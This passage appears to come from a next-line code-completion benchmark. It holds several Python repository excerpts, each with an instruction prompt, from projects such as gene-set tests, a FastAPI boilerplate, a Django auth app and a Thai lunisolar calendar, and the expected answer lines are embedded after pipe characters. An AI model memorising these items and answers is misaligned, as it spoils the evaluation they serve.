GeneValue(symbol="G", value=1),
GeneValue(symbol="H", value=1),
}
# Path: tests/unit/const.py
UNION_BOOLEAN_GENESET_GENES_0_1 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="B", value=1),
GeneValue(symbol="C", value=1),
GeneValue(symbol="D", value=1),
GeneValue(symbol="E", value=1),
GeneValue(symbol="F", value=1),
GeneValue(symbol="G", value=1),
GeneValue(symbol="H", value=1),
}
# Path: tests/unit/test_boolean_algebra_tool.py
from pathlib import Path
from geneweaver.tools.boolean_algebra.tool import (
BooleanAlgebra,
BooleanAlgebraInput,
BooleanAlgebraOutput,
BooleanAlgebraType,
WorkflowType,
)
from tests.unit.const import (
BOOLEAN_GENESET_GENES_0,
BOOLEAN_GENESET_GENES_1,
BOOLEAN_GENESET_GENES_2,
DIFF_BOOLEAN_GENESET_GENES_0_1_2,
INT_BOOLEAN_GENESET_GENES_0_1,
INT_BOOLEAN_GENESET_GENES_0_1_2,
INT_BOOLEAN_GENESET_GENES_0_2,
INT_BOOLEAN_GENESET_GENES_1_2,
UNION_BOOLEAN_GENESET_GENES_0_1,
)
import pytest
"""Test the boolean algebra tool class."""
@pytest.mark.parametrize(
("input_value", "expected"),
[
# Union
(
BooleanAlgebraInput(
type=BooleanAlgebraType.UNION,
| input_genesets=[BOOLEAN_GENESET_GENES_0, BOOLEAN_GENESET_GENES_1], |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: jpcadena/fastapi-boilerplate
# Path: app/api/deps.py
class RedisConnectionManager:
"""
Redis connection manager class
"""
def __init__(self, auth_settings: AuthSettings):
self.url: str = f"{auth_settings.REDIS_DATABASE_URI}"
self.pool: Optional[Redis] = None # type: ignore
async def start(self) -> None:
"""
Start the redis pool connection
:return: None
:rtype: NoneType
"""
self.pool = Redis.from_url(self.url, decode_responses=True)
await self.pool.ping()
logger.info("Redis Database initialized")
async def stop(self) -> None:
"""
Stops the redis connection
:return: None
:rtype: NoneType
"""
await self.pool.close() # type: ignore
async def get_connection(self) -> Optional[Redis]: # type: ignore
"""
Get the connection
:return: The redis connection
:rtype: Optional[Redis]
"""
return self.pool
@asynccontextmanager
async def connection(self) -> AsyncGenerator[Redis, Any]: # type: ignore
"""
Asynchronously get the connection from the pool context manager
:return: Yields the generator object
:rtype: AsyncGenerator[Redis, Any]
"""
await self.start()
yield self.pool # type: ignore
await self.stop()
# Path: app/config/config.py
@lru_cache()
def get_auth_settings() -> AuthSettings:
"""
Get auth settings cached
:return: Auth settings instance
:rtype: AuthSettings
"""
return AuthSettings()
# Path: app/config/config.py
@lru_cache()
def get_init_settings() -> InitSettings:
"""
Get init settings cached
:return: The init settings instance
:rtype: InitSettings
"""
return init_setting
# Path: app/config/config.py
@lru_cache()
def get_settings() -> Settings:
"""
Get settings cached
:return: The settings instance
:rtype: Settings
"""
return Settings()
# Path: app/crud/user.py
async def get_user_repository() -> UserRepository:
"""
Create a UserRepository with an async database session, an index
filter, and a unique filter.
:return: A UserRepository instance
:rtype: UserRepository
"""
return UserRepository(
await get_session(),
await get_index_filter(),
await get_unique_filter(),
)
# Path: app/db/init_db.py
async def init_db(
user_repo: UserRepository,
settings: Settings,
init_settings: InitSettings,
auth_settings: AuthSettings,
) -> None:
"""
Initialize the database connection and create the necessary tables.
:param user_repo: The user repository dependency.
:type user_repo: UserRepository
:param settings: Dependency method for cached setting object
:type settings: Settings
:param init_settings: Dependency method for cached init setting object
:type init_settings: InitSettings
:param auth_settings: Dependency method for cached setting object
:type auth_settings: AuthSettings
:return: None
:rtype: NoneType
"""
await create_db_and_tables()
await create_superuser(user_repo, settings, init_settings, auth_settings)
# Path: app/services/infrastructure/ip_blacklist.py
def get_ip_blacklist_service(
redis: Annotated[Redis, Depends(get_redis_dep)], # type: ignore
auth_settings: Annotated[AuthSettings, Depends(get_auth_settings)],
) -> IPBlacklistService:
"""
Get an instance of the IP Blacklist service
:param redis: Dependency method for async Redis connection
:type redis: Redis
:param auth_settings: Dependency method for cached setting object
:type auth_settings: AuthSettings
:return: IPBlacklistService instance
:rtype: IPBlacklistService
"""
return IPBlacklistService(redis, auth_settings.BLACKLIST_EXPIRATION_SECONDS)
# Path: app/core/lifecycle.py
import logging
from contextlib import asynccontextmanager
from typing import Any, AsyncGenerator
from fastapi import FastAPI
from app.api.deps import RedisConnectionManager
from app.config.config import get_auth_settings, get_init_settings, get_settings
from app.crud.user import get_user_repository
from app.db.init_db import init_db
from app.services.infrastructure.ip_blacklist import get_ip_blacklist_service
"""
A module for lifecycle in the app-core package.
"""
logger: logging.Logger = logging.getLogger(__name__)
@asynccontextmanager
async def lifespan(application: FastAPI) -> AsyncGenerator[Any, None]:
"""
The lifespan of the application
:param application: The FastAPI application
:type application: FastAPI
:return: An asynchronous generator for the application
:rtype: AsyncGenerator[Any, None]
"""
logger.info("Starting API...")
try:
| application.state.settings = get_settings() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: juliusmarkwei/auth-system
# Path: backend/accounts/serializers.py
class UserSerializer(serializers.ModelSerializer):
date_joined = serializers.ReadOnlyField()
password = serializers.CharField(write_only=True)
class Meta(object):
model = User
fields = (
"id",
"username",
"is_verified",
"email",
"first_name",
"last_name",
"address",
"phone",
"date_joined",
"updated_at",
"password"
)
extra_kwargs = {"password": {"write_only": True}}
def create(self, validated_data):
password = validated_data.pop('password', None)
instance = self.Meta.model(**validated_data)
# Adding the below line made it work for me.
instance.is_active = True
if password is not None:
# Set password does the hash, so you don't need to call make_password
instance.set_password(password)
instance.save()
return instance
# Path: backend/accounts/models.py
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(max_length=40, unique=True)
is_verified = models.BooleanField(default=False)
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
username = models.CharField(max_length=100, unique=True)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
address = models.CharField(max_length=100, blank=True, null=True)
phone = models.CharField(max_length=20, blank=True, null=True)
date_joined = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True, blank=True, null=True)
objects = UserManager()
USERNAME_FIELD = "username"
REQUIRED_FIELDS = ["email", "phone", "first_name", "last_name"]
def save(self, *args, **kwargs):
super(User, self).save(*args, **kwargs)
return self
def __str__(self):
return self.username
class Meta:
ordering = ("-date_joined",)
verbose_name = "User"
verbose_name_plural = "Users"
# Path: backend/accounts/models.py
class EmailConfirmationToken(models.Model):
user = models.OneToOneField(User, unique=True, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True, blank=True, null=True)
def __str__(self):
return self.user
class Meta:
verbose_name = "Email Confirmation Token"
verbose_name_plural = "Email Confirmation Tokens"
# Path: backend/accounts/utils.py
def send_confirmation_email(email, token_id, user_id):
data = {
"token_id": str(token_id),
"user_id": str(user_id)
}
message = get_template("accounts/confirmation_email.txt").render(data)
send_mail(
subject="Email Confirmation",
message=message,
from_email="[email protected]",
recipient_list=[email],
fail_silently=True
)
print("Email confirmation sent!")
# Path: backend/accounts/views.py
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework import status
from .serializers import UserSerializer
from .models import User, EmailConfirmationToken
from .utils import send_confirmation_email
class UserAPIView(APIView):
permission_classes = [AllowAny,]
def post(self, request):
user = request.data
serializer = UserSerializer(data=user)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def get_queryset(self):
return User.objects.all()
def get(self, request, *args, **kwargs):
users = self.get_queryset()
serializer = UserSerializer(users, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
def put(self, request, *args, **kwargs):
serializer_data = request.data.get("user", {})
serializer = UserSerializer(request.user, data=serializer_data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
class UserInformationAPIView(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, *args, **kwargs):
user = request.user
email = user.email
is_verified = user.is_verified
payload = {"email": email, "is_verified": is_verified}
return Response(data=payload, status=status.HTTP_200_OK)
class SendEmailConfirmationTokenAPIView(APIView):
permission_classes = [IsAuthenticated]
def post(self, request, format=None):
user = request.user
token = EmailConfirmationToken.objects.create(user=user)
| send_confirmation_email(email=user.email, token_id=token.pk, user_id=user.pk) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: vitant-lang/CBAM-ASPP
# Path: nets/xception.py
def xception(pretrained=True, downsample_factor=16):
model = Xception(downsample_factor=downsample_factor)
if pretrained:
model.load_state_dict(load_url('https://github.com/bubbliiiing/deeplabv3-plus-pytorch/releases/download/v1.0/xception_pytorch_imagenet.pth'), strict=False)
return model
# Path: nets/mobilenetv2.py
def mobilenetv2(pretrained=False, **kwargs):
model = MobileNetV2(n_class=1000, **kwargs)
if pretrained:
model.load_state_dict(load_url('https://github.com/bubbliiiing/deeplabv3-plus-pytorch/releases/download/v1.0/mobilenet_v2.pth.tar'), strict=False)
return model
# Path: nets/attention.py
class se_block(nn.Module):
def __init__(self, channel, ratio=16):
super(se_block, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Conv2d(channel, channel // ratio, kernel_size=1, bias=False),
nn.ReLU(inplace=True),
nn.Conv2d(channel // ratio, channel, kernel_size=1, bias=False),
nn.Sigmoid()
)
def forward(self, x):
y = self.avg_pool(x)
y = self.fc(y)
return x * y
# Path: nets/attention.py
class CBAM(nn.Module):
def __init__(self, in_channels, ratio=16, kernel_size=7):
super(CBAM, self).__init__()
self.channel_attention = ChannelAttention(in_channels, ratio)
self.spatial_attention = SpatialAttention(in_channels, kernel_size) # 传入 in_channels 参数
def forward(self, x):
x = self.channel_attention(x)
x = self.spatial_attention(x)
return x
# Path: nets/attention.py
class eca_block(nn.Module):
def __init__(self, channel, b=1, gamma=2):
super(eca_block, self).__init__()
kernel_size = int(abs((math.log(channel, 2) + b) / gamma))
kernel_size = kernel_size if kernel_size % 2 else kernel_size + 1
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.conv = nn.Conv1d(1, 1, kernel_size=kernel_size, padding=(kernel_size - 1) // 2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
y = self.avg_pool(x)
y = self.conv(y.squeeze(-1).transpose(-1, -2)).transpose(-1, -2).unsqueeze(-1)
y = self.sigmoid(y)
return x * y.expand_as(x)
# Path: nets/deeplabv3_plus.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from .xception import xception
from .mobilenetv2 import mobilenetv2
from .attention import se_block,CBAM,eca_block
from functools import partial
atteionb=[se_block,CBAM,eca_block]
class MobileNetV2(nn.Module):
def __init__(self, downsample_factor=8, pretrained=True):
super(MobileNetV2, self).__init__()
| model = mobilenetv2(pretrained) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: JiNanPiWang/apple_health_export_gpx_add_heartrate
# Path: utils/exceptions.py
class RateLimitException(Exception):
def __init__(self, message="API rate limit exceeded"):
self.message = message
super().__init__(self.message)
# Path: utils/exceptions.py
class NoInternetException(Exception):
def __init__(self, message="No Internet connection"):
self.message = message
super().__init__(self.message)
# Path: src/strava_gpx_uploader.py
import json
import os
import time
from stravalib.util.limiter import RateLimiter, XRateLimitRule
from stravalib.client import Client, exc
from utils.exceptions import RateLimitException, NoInternetException
def get_strava_client(access_token):
token = access_token
rate_limiter = RateLimiter()
rate_limiter.rules.append(XRateLimitRule(
{'short': {'usageFieldIndex': 0, 'usage': 0,
# 60s * 15 = 15 min
'limit': 100, 'time': (60 * 15),
'lastExceeded': None, },
'long': {'usageFieldIndex': 1, 'usage': 0,
# 60s * 60m * 24 = 1 day
'limit': 1000, 'time': (60 * 60 * 24),
'lastExceeded': None}}))
client = Client(rate_limiter=rate_limiter)
client.access_token = token
return client
class StravaGpxUploader:
def __init__(self, file_path: str, activity_type):
with open("config/strava_config.json", 'r') as f:
strava_config = json.load(f)
# Edit access_token in the strava_config.json or edit here
# like access_token = '***'
self.file_path = file_path
self.access_token = strava_config["access_token"]
self.activity_type = activity_type
self.client = get_strava_client(self.access_token)
def get_athlete_name(self):
athlete = None
for i in range(2):
try:
athlete = self.client.get_athlete()
except exc.RateLimitExceeded as err:
if i > 0:
raise RateLimitException("Daily Rate limit exceeded")
print("Rate limit exceeded in connecting - Retrying strava connection in 15 minutes")
time.sleep(900)
continue
break
print("Now authenticated for " + athlete.firstname + " " + athlete.lastname)
# client, gpxfile, strava_activity_type, notes
def upload_gpx(self):
gpxfile = self.file_path
if not os.path.isfile(gpxfile):
print("No file found for " + gpxfile + "!")
return False
print("Uploading " + gpxfile)
for i in range(2):
try:
# 如果上传成功,则会直接到底下break
upload = self.client.upload_activity(
activity_file=open(gpxfile, 'r'),
data_type='gpx',
description='',
activity_type=self.activity_type
)
except exc.RateLimitExceeded as err:
# 第二次循环才会直接到这里
# 这里是说今天已经超过了限制,退出程序
if i > 0:
raise RateLimitException("Daily Rate limit exceeded, please try tomorrow")
# 第一次循环会直接到这里
# 这里是说这一次超过了限制,等待15分钟
print("Rate limit exceeded in uploading - auto pausing uploads for 15 minutes to avoid rate-limit")
time.sleep(900)
continue
except ConnectionError as err:
| raise NoInternetException("No Internet connection: {}".format(err)) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: rgrizzell/CircuitPython_LILYGO_T-Deck
# Path: lilygo_tdeck.py
class Keyboard:
"""Controls the keyboard peripheral. This class can be extended to support additional
functionality if the keyboard is utilizing custom firmware.
:param i2c: Object representing the I2C interface used to communicate with the keyboard.
:type i2c: I2C
:param int device_address: The I2C address of the keyboard device. Default is 0x55 (85).
"""
def __init__(self, i2c: I2C, device_address: int = None) -> None:
self._i2c = i2c
self._i2c_addr = device_address or _KEYBOARD_I2C_ADDR
def get_keypress(self) -> str | None:
"""Get the last keypress.
:return: character representing the key that was pressed
"""
buf = bytearray(1)
self._i2c.try_lock()
self._i2c.readfrom_into(self._i2c_addr, buffer=buf)
self._i2c.unlock()
if buf != b"\x00":
return buf.decode()
return None
# Path: lilygo_tdeck.py
class TDeck:
"""Class representing the LILYGO T-Deck.
:param keyboard: Object representing the keyboard. If none is provided, one is created.
:type keyboard: Keyboard
:param trackball: Object representing the trackball. If none is provided, one is created.
:type trackball: Trackball
:param bool debug: Print extra debug statements during initialization.
"""
def __init__(
self,
keyboard: Keyboard = None,
trackball: Trackball = None,
debug: bool = False,
) -> None:
self.debug = debug
if sys.implementation.version[0] < 9:
raise NotImplementedError(
"LILYGO T-Deck only supports CircuitPython version 9.0.0 or greater"
)
self._i2c = board.I2C()
self._spi = board.SPI()
# Touchscreen
self._debug("Init touchscreen")
# TODO: Create driver: https://github.com/rgrizzell/CircuitPython_GT911
# int_pin = DigitalInOut(board.TOUCH_INT)
# self.touchscreen = GT911(self._i2c, _TOUCHSCREEN_I2C_ADDR, int_pin=int_pin)
# Keyboard
self._debug("Init keyboard")
self.keyboard = keyboard or Keyboard(self._i2c)
self.get_keypress = self.keyboard.get_keypress
# Trackball
self._debug("Init Trackball")
self.trackball = trackball or Trackball(
board.TRACKBALL_UP,
board.TRACKBALL_RIGHT,
board.TRACKBALL_DOWN,
board.TRACKBALL_LEFT,
board.TRACKBALL_CLICK,
)
self.get_trackball = self.trackball.get_trackball
self.get_click = self.trackball.get_click
# SD Card
self._debug("Init SD Card")
self.sdcard = None
try:
self.sdcard = SDCard(self._spi, board.SDCARD_CS)
vfs = storage.VfsFat(self.sdcard)
storage.mount(vfs, "/sd")
except OSError as error:
print("SD Card disabled:", error)
# Speaker
self._debug("Init Speaker")
self.speaker = None
try:
self.speaker = audiobusio.I2SOut(
board.SPEAKER_SCK, board.SPEAKER_WS, board.SPEAKER_DOUT
)
except RuntimeError:
pass
# Microphone
self._debug("Init Microphone")
self.microphone = None
if hasattr(audiobusio, "I2SIn"):
self.microphone = audiobusio.I2SIn(
board.MICROPHONE_SCK,
board.MICROPHONE_WS,
board.MICROPHONE_DIN,
board.MICROPHONE_MCK,
)
else:
print("Microphone disabled: audiobusio does not support I2S input")
# LoRa - Optional
# self._debug("Init LoRa")
def _debug(self, msg):
if self.debug:
print(msg)
# Path: examples/lilygo_tdeck_custom_keyboard.py
import time
import board
from lilygo_tdeck import Keyboard, TDeck
# SPDX-FileCopyrightText: 2017 Scott Shawcroft, written for Adafruit Industries
# SPDX-FileCopyrightText: Copyright (c) 2023 Robert Grizzell
#
# SPDX-License-Identifier: Unlicense
class MyCustomKeyboard(Keyboard):
def __init__(self, backlight: bool = True):
super().__init__(board.I2C())
self.backlight(backlight)
def backlight(self, state: bool = None, register: int = 0x1):
"""Send an I2C command to control the keyboard backlight.
Custom keyboard firmware is required for this to work.
"""
if state is None:
buf = bytearray(1)
else:
buf = bytearray(2)
buf[1] = int(state)
buf[0] = register
self._i2c.try_lock()
self._i2c.writeto(self._i2c_addr, buffer=buf)
self._i2c.unlock()
k = MyCustomKeyboard()
| t = TDeck(keyboard=k) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: dataaug/open-interpreter-free
# Path: interpreter/utils/count_tokens.py
def count_messages_tokens(messages=[], model=None):
"""
Count the number of tokens in a list of messages
"""
tokens_used = 0
for message in messages:
if isinstance(message, str):
tokens_used += count_tokens(message, model=model)
elif "message" in message:
tokens_used += count_tokens(message["message"], model=model)
if "code" in message:
tokens_used += count_tokens(message["code"], model=model)
if "output" in message:
tokens_used += count_tokens(message["output"], model=model)
prompt_cost = token_cost(tokens_used, model=model)
return (tokens_used, prompt_cost)
# Path: interpreter/utils/count_tokens.py
def count_tokens(text="", model="gpt-4"):
"""
Count the number of tokens in a string
"""
encoder = tiktoken.encoding_for_model(model)
return len(encoder.encode(text))
# Path: tests/test_interpreter.py
import os
import re
import time
import interpreter
from random import randint
from interpreter.utils.count_tokens import count_messages_tokens, count_tokens
Round to 2 decimal places.
""".strip()
messages = interpreter.chat(order_of_operations_message)
assert str(round(test_result, 2)) in messages[-1]["message"]
def test_delayed_exec():
interpreter.chat(
"""Can you write a single block of code and execute it that prints something, then delays 1 second, then prints something else? No talk just code. Thanks!"""
)
def test_nested_loops_and_multiple_newlines():
interpreter.chat(
"""Can you write a nested for loop in python and shell and run them? Don't forget to properly format your shell script and use semicolons where necessary. Also put 1-3 newlines between each line in the code. Only generate and execute the code. No explanations. Thanks!"""
)
def test_write_to_file():
interpreter.chat("""Write the word 'Washington' to a .txt file called file.txt""")
assert os.path.exists("file.txt")
interpreter.messages = [] # Just reset message history, nothing else for this test
messages = interpreter.chat(
"""Read file.txt in the current directory and tell me what's in it."""
)
assert "Washington" in messages[-1]["message"]
def test_markdown():
interpreter.chat(
"""Hi, can you test out a bunch of markdown features? Try writing a fenced code block, a table, headers, everything. DO NOT write the markdown inside a markdown code block, just write it raw."""
)
def test_generator():
start_of_message_emitted = False
end_of_message_emitted = False
start_of_code_emitted = False
end_of_code_emitted = False
executing_emitted = False
end_of_execution_emitted = False
for chunk in interpreter.chat("What's 38023*40334?", stream=True, display=False):
print(chunk)
if "start_of_message" in chunk:
start_of_message_emitted = True
if "end_of_message" in chunk:
end_of_message_emitted = True
if "start_of_code" in chunk:
start_of_code_emitted = True
if "end_of_code" in chunk:
end_of_code_emitted = True
if "executing" in chunk:
executing_emitted = True
if "end_of_execution" in chunk:
end_of_execution_emitted = True
assert start_of_message_emitted
assert end_of_message_emitted
assert start_of_code_emitted
assert end_of_code_emitted
assert executing_emitted
assert end_of_execution_emitted
def test_config_loading():
# because our test is running from the root directory, we need to do some
# path manipulation to get the actual path to the config file or our config
# loader will try to load from the wrong directory and fail
currentPath = os.path.dirname(os.path.abspath(__file__))
config_path = os.path.join(currentPath, "./config.test.yaml")
interpreter.extend_config(config_path=config_path)
# check the settings we configured in our config.test.yaml file
temperature_ok = interpreter.temperature == 0.25
model_ok = interpreter.model == "gpt-3.5-turbo"
debug_mode_ok = interpreter.debug_mode == True
assert temperature_ok and model_ok and debug_mode_ok
def test_system_message_appending():
ping_system_message = (
"Respond to a `ping` with a `pong`. No code. No explanations. Just `pong`."
)
ping_request = "ping"
pong_response = "pong"
interpreter.system_message += ping_system_message
messages = interpreter.chat(ping_request)
assert messages == [
{"role": "user", "message": ping_request},
{"role": "assistant", "message": pong_response},
]
def test_reset():
# make sure that interpreter.reset() clears out the messages Array
assert interpreter.messages == []
def test_token_counter():
system_tokens = count_tokens(
text=interpreter.system_message, model=interpreter.model
)
prompt = "How many tokens is this?"
prompt_tokens = count_tokens(text=prompt, model=interpreter.model)
messages = [
{"role": "system", "message": interpreter.system_message}
] + interpreter.messages
| system_token_test = count_messages_tokens( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: TheJacksonLaboratory/geneweaver-client
# Path: tests/unit/utils/cli/prompt/pydantic/conftest.py
MOCK_EXISTING_COMBINATIONS = [
dict(e)
for e in chain.from_iterable(
combinations(MOCK_EXISTING_FIELDS, r)
for r in range(len(MOCK_EXISTING_FIELDS) + 1)
)
]
# Path: tests/unit/utils/cli/prompt/pydantic/conftest.py
MOCK_MODEL_FIELD_COMBINATIONS = [
set(s)
for s in chain.from_iterable(
combinations(MOCK_MODEL_FIELDS, r) for r in range(len(MOCK_MODEL_FIELDS) + 1)
)
]
# Path: tests/unit/utils/cli/prompt/pydantic/conftest.py
MOCK_MODEL_FIELDS = [field_name for field_name in MockModel.__fields__.keys()]
# Path: tests/unit/utils/cli/prompt/pydantic/conftest.py
class MockModel(MockInternalModel):
"""Mock model for testing."""
sub_model: MockInternalModel
sub_model_optional: Optional[MockInternalModel]
# Path: tests/unit/utils/cli/prompt/pydantic/test_prompt_for_missing_fields.py
from unittest.mock import Mock
from geneweaver.client.utils.cli.prompt.pydantic import prompt_for_missing_fields
from tests.unit.utils.cli.prompt.pydantic.conftest import (
MOCK_EXISTING_COMBINATIONS,
MOCK_MODEL_FIELD_COMBINATIONS,
MOCK_MODEL_FIELDS,
MockModel,
)
import pytest
"""Test the prompt_for_missing_fields function."""
# We can't use every combination of fields because the number of combinations
# grows much too large to be practical.
# Instead, we use the first 25 and last 25 combinations.
@pytest.mark.parametrize(
"existing", MOCK_EXISTING_COMBINATIONS[:25] + MOCK_EXISTING_COMBINATIONS[-25:]
)
@pytest.mark.parametrize(
"exclude", MOCK_MODEL_FIELD_COMBINATIONS[:25] + MOCK_MODEL_FIELD_COMBINATIONS[-25:]
)
@pytest.mark.parametrize("prompt_to_keep_existing", [True, False])
def test_prompt_for_missing(existing, exclude, prompt_to_keep_existing, monkeypatch):
"""Test the prompt_for_missing_fields function."""
mock_prompt_to_keep = Mock()
mock_prompt_for_field_by_type = Mock()
monkeypatch.setattr(
"geneweaver.client.utils.cli.prompt.pydantic.prompt_to_keep_field",
mock_prompt_to_keep,
)
monkeypatch.setattr(
"geneweaver.client.utils.cli.prompt.pydantic.prompt_for_field_by_type",
mock_prompt_for_field_by_type,
)
prompt_for_missing_fields(MockModel, existing, exclude, prompt_to_keep_existing)
# We should prompt for every field in `existing` that is not in `exclude`.
if prompt_to_keep_existing and len(existing) > 0:
assert mock_prompt_to_keep.call_count == len(set(existing.keys()) - exclude)
# We should prompt for every field in `MockModel` that is not in
# `existing` or `exclude`.
assert mock_prompt_for_field_by_type.call_count == len(
| set(MOCK_MODEL_FIELDS) - set(existing.keys()) - exclude |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: hmmbug/pythaidate
# Path: pythaidate/constants.py
DAYS_IN_800_YEARS = 292207
# Path: pythaidate/constants.py
TIME_UNITS_IN_1_DAY = 800
# Path: pythaidate/constants.py
EPOCH_OFFSET = 373
# Path: pythaidate/constants.py
UCCAPON_CONSTANT = 2611
# Path: pythaidate/constants.py
APOGEE_ROTATION_DAYS = 3232
# Path: pythaidate/constants.py
CAL_TYPE_DAY_COUNTS = {
"A": 354,
"B": 355,
"C": 384,
"c": 384,
}
# Path: pythaidate/lsyear.py
from .constants import (
DAYS_IN_800_YEARS,
TIME_UNITS_IN_1_DAY,
EPOCH_OFFSET,
UCCAPON_CONSTANT,
APOGEE_ROTATION_DAYS,
CAL_TYPE_DAY_COUNTS,
)
class LSYear:
"""
A lightweight class representing a lunisolar year on new year's day.
"""
def __init__(self, year: int):
self.offset = False # adjusted later
self.year = year
# this year
self.horakhun = (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
self.kammacapon = TIME_UNITS_IN_1_DAY - (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) % TIME_UNITS_IN_1_DAY
# ucc_i = (2611 + self.ahargana) // APOGEE_ROTATION_DAYS
self.uccapon = (UCCAPON_CONSTANT + self.horakhun) % APOGEE_ROTATION_DAYS
avo_quot = (self.horakhun * 11 + 650) // 692
self.avoman = (self.horakhun * 11 + 650) % 692
if self.avoman == 0:
self.avoman = 692
self.masaken = (avo_quot + self.horakhun) // 30
self.tithi = (avo_quot + self.horakhun) % 30
if self.avoman == 692:
self.tithi -= 1
# rest_quot = self.horakhun // 7
self.weekday = self.horakhun % 7
# next year
horakhun1 = ((year + 1) * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
quot1 = (horakhun1 * 11 + 650) // 692
# avo1 = (ahargana1 * 11 + 650) % 692
# mas1 = (quot1 + ahargana1) // 30
tithi1 = (quot1 + horakhun1) % 30
# Faraut, pg 28
self.langsak = max(1, self.tithi)
self.nyd = self.langsak
if self.nyd < 6:
self.nyd += 29
self.nyd = (self.weekday - self.nyd + 1 + 35) % 7
# is there a solar year leap day?
self.leapday = self.kammacapon <= 207
# A: normal year, 354 days; B: leap day, 355 days; C: leap month, 384 days
self.cal_type = 'A' # normal year
if self.tithi > 24 or self.tithi < 6:
self.cal_type = 'C' # leap month
if self.tithi == 25 and tithi1 == 5:
self.cal_type = 'A'
if (self.leapday and self.avoman <= 126) or (not self.leapday and self.avoman <= 137):
self.cal_type = 'B' if self.cal_type != 'C' else 'c'
# start of next year
if self.cal_type == 'A':
self.next_nyd = (self.nyd + 4) % 7
elif self.cal_type == 'B':
self.next_nyd = (self.nyd + 5) % 7
elif self.cal_type == 'C' or self.cal_type == 'c':
self.next_nyd = (self.nyd + 6) % 7
| self.caldays = CAL_TYPE_DAY_COUNTS[self.cal_type] |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: finalparanoia/Bert-VITS2-Preprocess
# Path: utils/create.py
def create(dataset_name: str):
raw_files = ls(f"{raw_dir}/*.wav")
current_dataset_path = f"{dataset_dir}/{dataset_name}"
i = 0
if exist(current_dataset_path):
mv(current_dataset_path, current_dataset_path+".old")
mk_dataset_dir(current_dataset_path)
tasks = []
for raw_file in raw_files:
tasks.append(delayed(cut_long_silences)(dataset_name, raw_file, i))
i += 1
multi_work = Parallel(n_jobs=16, backend='multiprocessing')
multi_work(tasks)
for tmp in ls(f"{tmp_dir}/*.wav"):
mv(tmp, f"{current_dataset_path}/audios/Raw")
# Path: utils/tag.py
def tag(dataset_name: str):
current_dataset_dir = f"{dataset_dir}/{dataset_name}"
audio_dir = f"{current_dataset_dir}/audios/wavs"
filelist = ls(f"{audio_dir}/*.wav")
file_list_path = f"{current_dataset_dir}/filelists/{dataset_name}.list"
complete_list = read_breakpoint(file_list_path)
inference_pipeline = pipeline(
task=Tasks.auto_speech_recognition,
model=modelscope_model
)
for file in filelist:
if file[-3:] != 'wav':
continue
# todo 支持单数据集多角色
if file in complete_list:
continue
rec_result = inference_pipeline(file)
if 'text' not in rec_result:
continue
line = file + "|" + dataset_name + "|ZH|" + rec_result['text'] + "\n"
with open(file_list_path, 'a', encoding='utf-8') as f:
f.write(line)
# Path: utils/resample.py
def resample(dataset_name: str):
current_dataset_dir = f"{dataset_dir}/{dataset_name}"
processes = cpu_count() - 2 if cpu_count() > 4 else 1
pool = Pool(processes=processes)
tasks = []
in_dir = f"{current_dataset_dir}/audios/raw"
out_dir = f"{current_dataset_dir}/audios/wavs"
for dir_path, _, filenames in os.walk(in_dir):
# 子级目录
spk_dir = os.path.relpath(dir_path, in_dir)
spk_dir_out = os.path.join(out_dir, spk_dir)
if not os.path.isdir(spk_dir_out):
os.makedirs(spk_dir_out, exist_ok=True)
for filename in filenames:
if filename.endswith(".wav"):
tasks.append((spk_dir, filename, in_dir, out_dir))
for _ in tqdm(
pool.imap_unordered(process, tasks),
):
pass
pool.close()
pool.join()
print("音频重采样完毕!")
# Path: utils/clean.py
def clean(dataset_name: str):
for raw_wav in ls(f"{dataset_dir}/{dataset_name}/audios/raw/*.wav"):
rm(raw_wav)
